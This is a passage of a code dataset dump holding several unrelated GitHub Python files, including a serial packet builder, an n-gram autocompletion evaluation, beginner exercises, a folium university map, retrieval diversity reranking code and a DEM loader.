{self.defaultValue}\\n'\n if (self.policy != None):\n rep += f' policy: {self.policy}\\n'\n rep += f' constraint: {self.constraint}\\n'\n if (self.constraint == Constraint.Range):\n rep += f' minValue: {self.minValue}\\n'\n rep += f' maxValue: {self.maxValue}\\n'\n if (self.constraint == Constraint.Map):\n for entry in self.map:\n rep += f' {entry}\\n' \n rep += f' value: {self.value}\\n'\n return rep\n\nclass Record:\n def __init__(self, cmd, name, type=None):\n self.commandCode = cmd \n self.type = type\n self.name = name\n self.itemList = []\n self.length = 0\n\n def addItem(self, item):\n self.itemList.append(item)\n self.length += item.width\n\n def 
getItemByName(self, name):\n return next((item for item in self.itemList if item.name == name), False)\n\n \"\"\"\n Check correctness of record: each mandatory item must have a value set by configuration\n (no defaultValue)\n\n Return value: True - sanity check ok\n False - sanity check failed\n \"\"\"\n def checkSanity(self):\n for item in self.itemList:\n if ((item.policy == 'mandatory') and (item.value == None)):\n return False\n return True\n\n def __repr__(self):\n rep = f'Record(name={self.name}, type={self.type}, length={self.length})'\n return rep\n\nclass Schema:\n def __init__(self, filename):\n self.recordList = []\n self.load(filename)\n\n def load(self, filename):\n with open(filename) as f:\n jdoc = json.load(f)\n\n for record in jdoc:\n self.addRecord(record)\n\n def addRecord(self, record):\n if ('type' in record):\n r = Record(record['commandCode'], record['name'], record['type'])\n else:\n r = Record(record['commandCode'], record['name'])\n self.recordList.append(r)\n \n itemList = record['item']\n\n for item in itemList:\n i = Item(item['name'])\n i.dataType = DataType.parse(item['dataType'])\n i.position = item['position']\n i.width = item['width']\n i.description = item['description']\n if ('defaultValue' in item):\n i.defaultValue = item['defaultValue']\n if ('policy' in item):\n i.policy = item['policy']\n i.constraint = Constraint.parse(item['constraint']) \n if (i.constraint == Constraint.Range):\n i.minValue = item['minValue'] \n i.maxValue = item['maxValue'] \n if (i.constraint == Constraint.Map):\n for entry in item['map']:\n i.map.append(entry)\n i.value = None\n r.addItem(i)\n\n def getRecordByName(self, name):\n return next((copy.deepcopy(record) for record in self.recordList if record.name == name), False)\n\n def getRecordByType(self, type):\n return next((copy.deepcopy(record) for record in self.recordList if record.type == type), False) \n\nclass Config:\n def __init__(self, schema):\n self.recordList = []\n self.confData = []\n self.schema = schema\n\n \"\"\"\n Load configuration file in YAML format\n \n Record are allocated in recordList and configuration are applied locally\n\n Return value: True - if one or more item configurations are applied correctly\n False - if none of item configurations are applied\n \"\"\"\n def load(self, filename):\n with open(filename) as f:\n try:\n self.confData = yaml.load(f, Loader=yaml.FullLoader)\n except Exception as e:\n print(f\"E: error reading configuration file {filename} - {e}\")\n sys.exit(-1)\n\n for readEntry in self.confData:\n acceptRecord = False\n record = self.schema.getRecordByName(readEntry['record'])\n if (record):\n for readItem in readEntry.items():\n if (readItem[0] == 'record'): continue\n item = record.getItemByName(readItem[0])\n if (item):\n try:\n item.assignValue(readItem[1])\n except Exception as e:\n print(f\"E: Config.load() record:{record.name} item:{readItem[0]} value:{readItem[1]} wrong item value - {e}\")\n else:\n acceptRecord = True\n else:\n print(f\"E: Config.load() record:{record.name} item:{readItem[0]} wrong item name\")\n\n if (acceptRecord):\n if record.checkSanity():\n # copy record schema\n self.recordList.append(record)\n else:\n print(f\"E: record:{record.name} sanity check failed\")\n else:\n print(f\"E: Config.load() record:{readEntry['record']} wrong record name\")\n\n return (len(self.recordList) > 0)\n\nclass PacketBuilder:\n def encodeItem(self, value, dataType):\n retVal = bytearray()\n if (dataType == DataType.Char):\n retVal = bytes(value, 'utf-8')\n elif 
(dataType == DataType.Byte):\n retVal.append(value)\n elif (dataType == DataType.Short):\n retVal = struct.pack('>h', value)\n elif (dataType == DataType.Integer):\n retVal = struct.pack('>i', value)\n elif (dataType == DataType.Float):\n retVal = struct.pack('>f', value)\n elif (dataType == DataType.Double):\n retVal = struct.pack('>d', value) \n elif (dataType == DataType.Array):\n retVal = bytearray(value)\n\n return retVal \n\n def checksum(self, frame):\n # skip first frame element (STX)\n return (sum(frame[1:]) % 256)\n\n \"\"\"\n Build binary frame (from a record) to send by serial\n\n Return value: bytearray of encoded data \n \"\"\"\n def encodeRecord(self, record):\n frame = bytearray()\n # header of command \n frame.append(0x02) # 0: STX\n frame.append(0x00) # 1: STATUS\n frame.append(record.commandCode) # 2: PACKET TYPE\n frame.append(0x00) # 3: LENGTH (to calculate)\n\n if (record.commandCode == 0x64):\n\n frame.append(0x00) # 4: TRANSMISSION NUMBER\n frame.append(0x00) # 5: PAGE INDEX\n frame.append(0x00) # 6: MAXIMUM PAGE INDEX\n\n # file control information block\n frame.append(0x03) # 7: APPLICATION FILE SPECIFICATION VERSION\n frame.append(0x00) # 8: DEVICE TYPE (00h = all)\n frame.append(0x01) # 9: START APPLICATION FILE FLAG (01h = apply immediately)\n frame.append(0x00) # 10: FACTORY SETTINGS FLAG (00h = set only specified params)\n\n # application file record\n frame.append(record.type)\n frame.append(record.length) \n\n for item in record.itemList:\n if (item.value == None):\n value = item.defaultValue\n else:\n value = item.value\n\n # pad string with space (fixed length string)\n if (item.dataType == DataType.Char):\n value = value.ljust(item.width)\n\n # encode item value\n encValue = self.encodeItem(value, item.dataType)\n frame.extend(encValue)\n \n # trailer\n length = len(frame) - 4 \n frame[3] = self.encodeItem(length, DataType.Byte)[0]\n\n cksum = self.encodeItem(self.checksum(frame), DataType.Byte)\n frame.extend(cksum) # CHECKSUM\n frame.append(0x03) # ETX\n\n return frame\n\n def print(self, frame):\n s = frame.hex()\n print(' '.join(s[i:i+2] for i in range(0, len(s), 2)))\n \nclass SerialChannel:\n def __init__(self, port, baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE):\n try:\n self.serial = serial.Serial(port, baudrate, bytesize, parity, stopbits, timeout=1)\n except Exception as e:\n print(f\"E: error opening serial port {port} - {e}\")\n sys.exit(-1)\n\n if (self.reset() == False):\n print(f\"E: error resetting serial port {port}\")\n sys.exit(-1)\n \n def enquiry(self):\n self.serial.write(ENQ)\n res = self.serial.read(1)\n if (res == ACK):\n return True\n\n return False\n\n def reset(self):\n for i in range(1,256):\n self.serial.write(RESET)\n if (self.enquiry()):\n return True\n\n return False \n \n def sendFrame(self, frame):\n if (self.reset()):\n self.serial.write(frame)\n res = self.serial.read(1)\n if (res == b''):\n raise SerialError(f\"sendFrame error: frame not acknowledge\")\n elif (res != ACK):\n raise SerialError(f\"sendFrame error: frame not acknowledge - {ord(res)}\")\n else:\n raise SerialError(f\"sendFrame error: device busy or not connected\")\n","repo_name":"gtortone/spb2-utils","sub_path":"gps/lib/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":12935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1203099205","text":"import concurrent\nimport json\nimport nltk\nfrom nltk.corpus import 
brown\nimport pytrec_eval\nfrom tqdm import tqdm\n\nfrom utils.preprocess import cleansing, cleansing_test, preprocess_pipeline\nfrom utils.ngram_model import NGramModel\nfrom utils.helper import load_test\n\n\nif __name__ == \"__main__\":\n nltk.download('brown')\n\n # region Model Fitting\n new_list = brown.sents()\n min_freq = 6\n tokenized_sent = preprocess_pipeline(new_list)\n final_train, vocabulary = cleansing(tokenized_sent, min_freq)\n\n ns = [1, 2, 3, 5, 10]\n model_loc = 'models'\n\n for n in ns:\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.fit(final_train)\n model.save_model()\n # endregion\n\n # region validation\n previous_tokens = [\"the\", \"jury\"]\n \n for n in ns:\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.load_model()\n print(f\"{n}-gram model prediction: {model.get_suggestions(previous_tokens)}\")\n # endregion\n\n # region testing\n # Making prediction on all the birdbeck data Just checking success at k for all the predictions\n test_df = load_test(file_loc='data/APPLING1DAT.643')\n tokenized_sent = preprocess_pipeline(test_df['previous-tokens'].values.tolist(), remove_empty=False)\n final_test = cleansing_test(tokenized_sent, vocabulary)\n test_df['final-test'] = final_test\n\n queries = [{} for _ in ns]\n results_eval = [{} for _ in ns]\n\n for idx, n in enumerate(ns):\n model = NGramModel(n=n, model_loc=model_loc, vocabulary=vocabulary)\n model.load_model()\n\n argument_list = final_test\n suggestions = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for result in executor.map(model.get_suggestions, argument_list):\n suggestions.append(result)\n\n query = queries[idx]\n result_eval = results_eval[idx]\n for fill_in_word, test_previous_tokens, suggestion in tqdm(zip(test_df['fill-in-word'], final_test,\n suggestions), total=len(final_test),\n desc=f'Predictions-{n}-gram-model'):\n query[f\"{' '.join(test_previous_tokens)} *\"] = {fill_in_word: 1}\n result_eval[f\"{' '.join(test_previous_tokens)} *\"] = {}\n \n # to generate the example \n # print(test_previous_tokens)\n # print(fill_in_word)\n # print(suggestion)\n \n for word in [w[0] for w in suggestion[1]]:\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1\n\n for word in [w[0] for w in suggestion[5]]:\n if word not in result_eval[f\"{' '.join(test_previous_tokens)} *\"].keys():\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1 / 5\n\n for word in [w[0] for w in suggestion[10]]:\n if word not in result_eval[f\"{' '.join(test_previous_tokens)} *\"].keys():\n result_eval[f\"{' '.join(test_previous_tokens)} *\"][word] = 1 / 10\n\n print('#' * 20)\n print(f'Stats of {n}-gram model')\n print('#' * 20)\n evaluator = pytrec_eval.RelevanceEvaluator(query, {'success'})\n \n # # to print result for each test-sample\n # print(json.dumps(evaluator.evaluate(result_eval), indent=1))\n eval = evaluator.evaluate(result_eval)\n\n for measure in sorted(list(eval[list(eval.keys())[0]].keys())):\n print(measure, 'average:',\n pytrec_eval.compute_aggregated_measure(\n measure, [query_measures[measure] for query_measures in eval.values()])\n )\n print('#' * 20)\n # endregion\n","repo_name":"bandpooja/Auto_Completion","sub_path":"assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44524728751","text":"#Tan Hyong Hsing\n#20DDT21F1002\n\ncentimeters = float(input(\"Input the length 
in centimeters\\n\"))\nif centimeters >= 0 :\n    inches = centimeters / 2.54\n    two_decimal = round(inches ,2)\n    print(two_decimal , \"inch\")\nelse :\n    print(\"Sorry , your input is invalid . Please try again . \")\n#if centimeters < 0 :\n   # print(\"Sorry , your input is invalid . Please try again . \")\n#else :\n   # inches = centimeters / 2.54\n   # print(inches , \"inch\")\n    \nprint(\"Thank you for using our system.\")","repo_name":"TANHYONGHSING/legend","sub_path":"PYTHONPROJECT/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44820117656","text":"import sys\nfrom string import punctuation\n\n\ndef main():\n    print(punctuation)\n    punct = \"!\\\"#$%&'()*+,-./:;<=>?@[]\\\\^_`{|}~\"\n    if len(sys.argv) == 1:\n        string = input(\"What is the text to count?\\n\")\n        arg = string\n    else:\n        arg = sys.argv[1]\n    try:\n        assert len(sys.argv) < 3, \"only one argument pls\"\n        print(\"The text contains\", len(arg), \"characters:\")\n        print(sum(1 for a in arg if a.isupper()), \"upper letters\")\n        print(sum(1 for a in arg if a.islower()), \"lower letters\")\n        print(sum(1 for a in arg if a in punct), \"punctuation marks\")\n        print(arg.count(' '), \"spaces\")\n        print(sum(1 for a in arg if a.isnumeric()), \"digits\")\n\n    except AssertionError as msg:\n        print(msg)\n\n\nmain.__doc__ = \"count all char: uppercase, lowercase, punctuation\\\n, spaces, digits\"\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Roymain/42_IA","sub_path":"Day0/ex05/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11688673478","text":"#!/usr/bin/env python3.5.2\n# -*- coding: utf-8 -*-\nfrom collections import Counter\n\n\n# Result analysis:\ndef resultType(result):\n\n    count = 0\n    indexNum = list()\n    for kk in range(len(result)):\n        if(result[count][result[count].argmax()]>=0.5):\n            index = result[count].argmax()+1    # keep the argmax index only when the max value is >= 0.5, otherwise discard it\n            indexNum.append(index)\n        count += 1\n    # tally how often each argmax index occurs; if the most common index appears at least half the total count minus one, return that index, otherwise return 0\n    index=Counter(indexNum)\n    if(index.__len__()!=0):\n        maxIndex,maxValue=index.most_common(1).pop()\n        if (maxValue >= len(result) / 2 - 1):\n            return maxIndex\n        else:\n            return 0\n    else:\n        return 0\n","repo_name":"907231602/ApiDjangoSite","sub_path":"myApi/ResultAnalysis.py","file_name":"ResultAnalysis.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30063479627","text":"def read_file(filepath):\n    with open(filepath) as f:\n        lines = f.readlines()\n    return [int(line.rstrip()) for line in lines]\n\n\ndef num_increases(data):\n    count = 0\n\n    for i, v in enumerate(data):\n        if (i != 0 and v > data[i - 1]):\n            count += 1\n    \n    return count \n\n\ndef sliding_window(data):\n    count = 0\n    curr_sum = data[0] + data[1] + data[2]\n    prev_sum = 0\n\n    for i, v in enumerate(data):\n        if (i != 0 and i < len(data) - 2):\n            curr_sum -= data[i - 1]\n            curr_sum += data[i + 2]\n\n        if (curr_sum > prev_sum):\n            count += 1\n\n        prev_sum = curr_sum\n\n    return count\n\n\ndef main():\n    data = read_file(\"day1.txt\")\n    print(num_increases(data))\n    print(sliding_window(data))\n\n\nif __name__ == \"__main__\":\n    
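    # run part 1 (count of pairwise depth increases) and part 2 (increases between 3-measurement sliding-window sums) on day1.txt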
main()","repo_name":"jessicalally/advent-of-code-2021","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70876273529","text":"import imp\nimport pandas as pd\nimport folium\nfrom folium.plugins import MiniMap\nfrom folium.plugins import MarkerCluster\n\n\n\nfilepath = r'F:\\OneDrive - 천안중앙고등학교\\pythonworkspace\\PROJECT\\대학지도제작PRJ\\학교주소좌표전환결과최종본.xlsx'\nexcel_file=pd.read_excel(filepath,engine='openpyxl', header=None)\n\nexcel_file.columns = ['학교이름', '주소', 'x', 'y', '웹페이지']\n\nname_list = excel_file['학교이름'].to_list()\naddr_list = excel_file['주소'].to_list()\nposition_x_list = excel_file['x'].to_list()\nposition_y_list = excel_file['y'].to_list()\n\nweb_list = excel_file['웹페이지']\n\nmap=folium.Map(location=[37,127],zoom_start=7)\nfor i in range(len(name_list)):\n if position_x_list[i] != 0:\n marker=folium.Marker([position_y_list[i],position_x_list[i]],\n popup='
'+name_list[i]+'<br>'+addr_list[i]+'<br>'+web_list[i]+'
',\n icon = folium.Icon(color='red', icon='star'))\n marker.add_to(map)\n\n\nminimap = MiniMap() \nminimap.add_to(map)\n\nmap.save(r'F:\\OneDrive - 천안중앙고등학교\\pythonworkspace\\PROJECT\\대학지도제작PRJ\\korea_university_map.html')","repo_name":"Kyong4612/CAJA-PRJ-1","sub_path":"4.모든대학표시하기.py","file_name":"4.모든대학표시하기.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28078994071","text":"import copy\nimport math\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nfrom datasets import Dataset\nfrom scipy.special import softmax\nfrom scipy.stats import zscore\nfrom transformers import pipeline\nfrom transformers.pipelines.pt_utils import KeyDataset\nfrom typing import Optional\nfrom tqdm import tqdm\n\nfrom ..utils import RegistryMixin, compute_f1_matrix_fast\nfrom .agent_utils import AgentBatchOutput\n\n\n# Can run without ray installed\nis_ray_installed = True\ntry:\n import ray\nexcept ImportError:\n is_ray_installed = False\n\n\n@dataclass\nclass DiversityConfig:\n n: int = 3\n s: int = 3\n tau: float = 10.0\n redundancy_penalty: float = 0.1\n embed_fn: Optional[callable] = None\n device: str = \"cuda\"\n\n\nclass DiversityStrategy(RegistryMixin, ABC):\n subclasses = {}\n requires_doc_embeds = False # Child classes should set this to True if they require doc embeds\n\n def __init__(self, config: DiversityConfig) -> None:\n super().__init__()\n self.config = config\n\n @abstractmethod\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n pass\n\n@DiversityStrategy.register_subclass(\"mmr\")\nclass MMR(DiversityStrategy):\n\n requires_doc_embeds = True\n\n def rerank(\n self, \n outputs: AgentBatchOutput, \n k: int\n ):\n doc_embeds = torch.tensor(outputs.doc_embeds).to(self.config.device)\n # BNM, BNM -> BNN\n inter_doc_scores = torch.bmm(doc_embeds, doc_embeds.transpose(1, 2)).cpu().numpy()\n #inter_doc_scores = np.einsum('BNM,BOP -> BNP', doc_embeds, np.transpose(doc_embeds, (0, 2, 1)))\n inter_doc_scores = zscore(inter_doc_scores, axis=2)\n doc_scores = np.array(outputs.doc_scores)\n doc_scores = zscore(doc_scores, axis=1)\n l = 0.5\n\n docs = outputs.docs\n batch_chosen_docs = []\n for i in range(len(docs)):\n chosen_idxs = []\n remaining_idxs = list(range(len(docs[i])))\n for k_ in range(k):\n if k_ == 0:\n idx = np.argmax(doc_scores[i])\n chosen_idxs.append(idx)\n remaining_idxs.remove(idx)\n continue\n\n best_idx, best_mmr = None, -99999.\n for idx in remaining_idxs:\n mmr = (1 - l) * np.argsort(np.max(inter_doc_scores[i, idx])) - l * np.argsort(doc_scores[i, idx])\n best_idx, best_mmr = max([(best_idx, best_mmr), (idx, mmr)], key=lambda x: x[1])\n\n chosen_idxs.append(best_idx)\n remaining_idxs.remove(best_idx)\n\n chosen_docs = [docs[i][idx] for idx in chosen_idxs]\n batch_chosen_docs.append(chosen_docs)\n\n return AgentBatchOutput(docs=batch_chosen_docs)\n\n\n@DiversityStrategy.register_subclass(\"topic\")\nclass Topic(DiversityStrategy):\n\n roberta = pipeline(\"text-classification\", model=\"cardiffnlp/tweet-topic-21-multi\", device=0)\n doc2label = {}\n\n def precompute(self, dataset: Dataset) -> None:\n labels = []\n for doc in tqdm(self.roberta(KeyDataset(dataset, \"text\"), batch_size=32, truncation=True, padding=\"max_length\", max_length=64), total=len(dataset)):\n labels.append(doc[\"label\"])\n texts = dataset[\"text\"]\n\n for text, label in zip(texts, labels):\n 
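            # cache the predicted topic for each text so rerank() can reuse it instead of re-running the classifier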
self.doc2label[text] = label\n\n def rerank(\n self,\n outputs: AgentBatchOutput,\n k: int\n ):\n\n batch_docs = []\n for i in range(len(outputs.docs)):\n\n docs = [outputs.docs[i][idx] for idx in reversed(np.argsort(outputs.doc_scores[i]).tolist())]\n \n labels = [None for _ in docs]\n idxs_to_query = []\n docs_to_query = []\n for i, doc in enumerate(docs):\n if doc in self.doc2label:\n labels[i] = self.doc2label[doc]\n else:\n idxs_to_query.append(i)\n docs_to_query.append(doc)\n\n topic_outputs = self.roberta(docs_to_query)\n\n labels_to_add = [s[\"label\"] for s in topic_outputs]\n for idx, label, doc in zip(idxs_to_query, labels_to_add, docs_to_query):\n labels[idx] = label\n self.doc2label[doc] = label\n\n assert all([l is not None for l in labels])\n\n chosen_docs = []\n chosen_labels = []\n for doc, label in zip(docs, labels):\n if label not in chosen_labels:\n chosen_docs.append(doc)\n chosen_labels.append(label)\n if len(chosen_docs) == k:\n break\n\n for doc in chosen_docs:\n if len(chosen_docs) == k:\n break\n chosen_docs.append(doc)\n\n assert len(chosen_docs) == k\n\n batch_docs.append(chosen_docs)\n\n return AgentBatchOutput(docs=batch_docs)\n\n\n@DiversityStrategy.register_subclass(\"mcvae\")\nclass MCVAE(DiversityStrategy):\n\n requires_doc_embeds = True\n \n def rerank(\n self, \n outputs: AgentBatchOutput, \n k: int\n ):\n\n\n embeds = self.config.embed_fn(\n torch.tensor(outputs.query_embed).to(self.config.device), num_samples=self.config.s\n ) # bsz x s x dim\n\n scores = torch.bmm(\n embeds, torch.tensor(outputs.doc_embeds).to(self.config.device).transpose(1, 2)\n )\n\n batch_docs = []\n for i in range(len(outputs.docs)):\n votes = scores[i].argmax(-1).cpu().numpy().tolist()\n vote_sums = [(j, votes.count(j)) for j in range(self.config.n)]\n vote_sums = list(reversed(sorted(vote_sums, key=lambda x: x[1])))[:k]\n vote_idxs, _ = zip(*vote_sums)\n docs = [outputs.docs[i][idx] for idx in vote_idxs]\n\n batch_docs.append(docs)\n\n return AgentBatchOutput(docs=batch_docs)\n\n\ndef _search(scores, docs, k, search_fn):\n idxs = search_fn(scores, k)\n score = np.mean(np.max(scores[list(idxs)], axis=0), axis=-1).item()\n best_answer = [docs[idx] for idx in idxs]\n\n return best_answer, score, idxs\n\n\ndef _rerank(policy_docs, world_docs, world_scores, k, search_fn, tau):\n scores = [compute_f1_matrix_fast(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n probs = [softmax(np.array(s) / tau) for s in world_scores]\n scores = [s * np.expand_dims(p, axis=0) for s, p in zip(scores, probs)]\n best_answer, score, idxs = zip(*[_search(s, docs, k, search_fn) for s, docs in zip(scores, policy_docs)])\n\n return best_answer, score, idxs\n\n\nclass SimSR(DiversityStrategy):\n\n @abstractmethod\n def run_search(self, scores, k):\n pass\n\n @staticmethod\n def _score_fn(scores):\n return np.mean(np.max(scores, axis=0), axis=-1).item()\n\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n # Check if we have enough documents to rerank\n # must be more than s and more than n to rerank\n if len(outputs.docs[0]) < self.config.s or len(outputs.docs[0]) < self.config.n:\n raise ValueError(\"Not enough documents to rerank\")\n\n # Sort outputs\n docs = outputs.docs\n if self.config.n != self.config.s:\n argsort = np.argsort(np.array(outputs.doc_scores), axis=-1)\n docs = [[outputs.docs[i][idx] for idx in argsort[i]] for i in range(argsort.shape[0])]\n \n world_docs = [D[-self.config.s:] for D in docs]\n world_scores = [S[-self.config.s:] for S in outputs.doc_scores]\n 
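        # split the score-sorted candidates: the top-s "world" docs (below) weight expected overlap, while the top-n "policy" docs form the pool the search picks k answers from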
policy_docs = [D[-self.config.n:] for D in docs]\n\n if not is_ray_installed or not ray.is_initialized():\n best_answer, score, idxs = _rerank(\n policy_docs, \n world_docs, \n world_scores, \n k, \n self.run_search, \n self.config.tau\n )\n else:\n # Get number of workers\n num_workers = ray.cluster_resources().get(\"CPU\", 1)\n\n # Chunk through inputs to _rerank\n chunk_size = math.ceil(len(docs) / num_workers)\n chunks = [docs[i:i + chunk_size] for i in range(0, len(docs), chunk_size)]\n chunks = [[c, world_docs[i:i + chunk_size], world_scores[i:i + chunk_size], k, self.run_search, self.config.tau] for i, c in enumerate(chunks)]\n\n # Run _rerank in parallel\n results = [ray.remote(_rerank).remote(*c) for c in chunks]\n results = ray.get(results)\n\n # Unpack results\n best_answer, score, idxs = zip(*results)\n\n # Unchunk results\n best_answer = [a for b in best_answer for a in b]\n score = [s for s in score for _ in range(len(s))]\n idxs = [i for i in idxs for _ in range(len(i))]\n \n return AgentBatchOutput(\n docs=list(best_answer),\n score=list(score),\n doc_indices=list(idxs),\n topn_doc_indices=[I.tolist() for I in outputs.doc_indices],\n topn_docs=policy_docs,\n )\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_greedy\")\nclass SimSRGreedy(SimSR):\n\n def run_search(self, scores, k):\n idxs = list(range(scores.shape[0]))\n chosen_idxs = []\n all_scores = []\n for _ in range(k):\n chosen_idxs, idxs, e_scores = self._get_idxs(scores, idxs, chosen_idxs)\n all_scores.append(e_scores)\n\n # Normalisation\n all_scores = [[np.round(s * 1000, 2) for s in S] for S in all_scores]\n chosen_idxs\n\n return chosen_idxs\n\n def _get_idxs(self, scores, idxs, chosen_idxs):\n e_scores = []\n for idx in idxs:\n if idx in chosen_idxs:\n e_scores.append(-1e10)\n continue\n tmp_idxs = chosen_idxs + [idx]\n S = scores[list(tmp_idxs)]\n red_penalty = np.max(scores[chosen_idxs, idx]) if len(chosen_idxs) > 0 else 0.0\n e_score = self._score_fn(S) - self.config.redundancy_penalty * red_penalty\n e_scores.append(e_score)\n\n best_idx = idxs[np.argmax(e_scores)] # Note: this is the idx in idxs, not in scores\n chosen_idxs.append(best_idx)\n\n return chosen_idxs, idxs, e_scores\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_ablative\")\nclass SimSRAblative(SimSR):\n\n def run_search(self, scores, k):\n idxs = list(range(scores.shape[0])) \n\n while len(idxs) > k:\n best_score = -1.0\n best_idx = None\n for idx in idxs:\n tmp_idxs = copy.copy(idxs)\n tmp_idxs.remove(idx)\n\n S = scores[tmp_idxs]\n e_score = self._score_fn(S)\n\n best_score, best_idx = max([(best_score, best_idx), (e_score, idx)], key=lambda x: x[0])\n\n idxs.remove(best_idx)\n\n e_scores = scores.mean(axis=1)[idxs].tolist()\n\n # Resort idxs by score in descending order\n idxs = [x for _, x in sorted(zip(e_scores, idxs), key=lambda x: x[0], reverse=True)]\n\n return idxs\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_ablative_gpu\")\nclass SimSRAblativeGPU(SimSR):\n\n \"\"\"\n A GPU-based implementation of ablative search.\n \"\"\"\n\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n # Check if we have enough documents to rerank\n # must be more than s and more than n to rerank\n if len(outputs.docs[0]) < self.config.s or len(outputs.docs[0]) < self.config.n:\n raise ValueError(\"Not enough documents to rerank\")\n\n # Sort outputs\n docs = outputs.docs\n if self.config.n != self.config.s:\n argsort = np.argsort(np.array(outputs.doc_scores), axis=-1)\n docs = [[outputs.docs[i][idx] for idx in argsort[i]] 
for i in range(argsort.shape[0])]\n        \n        world_docs = [D[-self.config.s:] for D in docs]\n        world_scores = [S[-self.config.s:] for S in outputs.doc_scores]\n        policy_docs = [D[-self.config.n:] for D in docs]\n\n        if not is_ray_installed or not ray.is_initialized():\n            scores = [compute_f1_matrix_fast(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n        else:\n            scores = [ray.remote(compute_f1_matrix_fast).remote(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n            scores = ray.get(scores)\n\n        probs = F.softmax(torch.tensor(world_scores).cuda() / self.config.tau, dim=-1).unsqueeze(1)\n        scores = torch.tensor(np.array(scores)).cuda() * probs\n\n        idxs = self.run_search(scores, k)\n        best_answer = [[policy_docs[i][x] for x in idx] for i, idx in enumerate(idxs)]\n\n        return AgentBatchOutput(\n            docs=best_answer,\n            doc_indices=idxs,\n            topn_doc_indices=[I.tolist() for I in outputs.doc_indices],\n            topn_docs=policy_docs,\n        )\n\n    def run_search(self, scores, k):\n        \"\"\"\n        scores is 3d tensor of shape (batch size, n, s)\n        \"\"\"\n        idxs = [list(range(scores.shape[1])) for _ in range(scores.shape[0])]\n\n        scores = scores.unsqueeze(2).cuda().expand(-1, -1, scores.shape[1], -1) \n\n        # Create a mask\n        mask = torch.ones(scores.size()).cuda()\n        for i in range(scores.shape[1]):\n            mask[:, i, i, :] = 0.0\n\n        best_idx_mask = torch.ones([scores.shape[0], scores.shape[1]]).cuda()\n\n        # We will incrementally add to the mask\n        while len(idxs[0]) > k:\n            # Compute scores\n            S = scores * mask\n            S = S.max(1)[0].mean(-1)\n\n            # The best idx is the one that led to the highest score when it\n            # was removed.\n            best_idxs = torch.argmax(S * best_idx_mask, dim=-1)\n            for i, (best_idx, idx) in enumerate(zip(best_idxs, idxs)):\n                idxs[i].remove(best_idx)\n\n                # Update the masks\n                mask[i, best_idx, :, :] = 0.0\n                best_idx_mask[i, best_idx] = 0.0\n\n        # Check that we have the right number of idxs\n        assert len(idxs[0]) == k\n\n        return idxs\n","repo_name":"BenjaminTowle/STAR","sub_path":"src/agents/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":14183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33457441988","text":"import os\nimport pickle\nimport numpy as np # print (np.__version__) gives 1.18.4\nfrom osgeo import gdal\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport xml.etree.ElementTree as ET\nimport pandas as pd\n\nfrom linecache import getline\nfrom math import radians, sin, cos\nfrom utilities import rot\nfrom color_balance import simplest_cb\n\n\nclass DEM:\n    def __init__(self, filePath):\n        # initialize\n        self.filePath = filePath\n        self.cols = 0.0\n        self.rows = 0.0\n        self.xlucorner = 0.0\n        self.ylucorner = 0.0\n        self.cellsize = 0.0\n        self.nodata_value = 0.0\n        self.avg = 0.0 # average elevation\n\n    def loadDem(self):\n        # Open the file:\n        (dirName, extension) = os.path.splitext(self.filePath)\n\n        # deal with headers \n        hdr = [getline(self.filePath, i) for i in range(1, 7)] # type(hdr) gives <class 'list'>\n        values = [float(h.split(\" \")[-1].strip()) for h in hdr]\n        # split h with \" \"(space), get the rightmost value and delete unnecessary space with strip\n\n        self.cols, self.rows, xllcorner, yllcorner, self.cellsize, self.nodata_value = values\n        self.xlucorner = xllcorner\n        self.ylucorner = yllcorner + self.cellsize * self.rows\n\n        # asc to .pkl \n        while True:\n            try: # if .pkl exists\n                with open(dirName + '.pkl', 'rb') as f:\n                    DEM = pickle.load(f)\n                    # print(type(DEM)) gives <class 'numpy.ndarray'> # DEM.shape gives (5555, 5922)\n                    self.avg = np.nanmean(DEM) # gives 109.46928947586392\n                    f.close()\n                break\n\n            except IOError: # if not\n                arr = np.loadtxt(self.filePath,\n                                 skiprows=6) # Load the asc ndarray into a numpy array # arr.shape gives (5555, 5922)\n                arr = np.where(arr == -9999.0, np.nan,\n                               arr) # replace -9999.0 with nan in 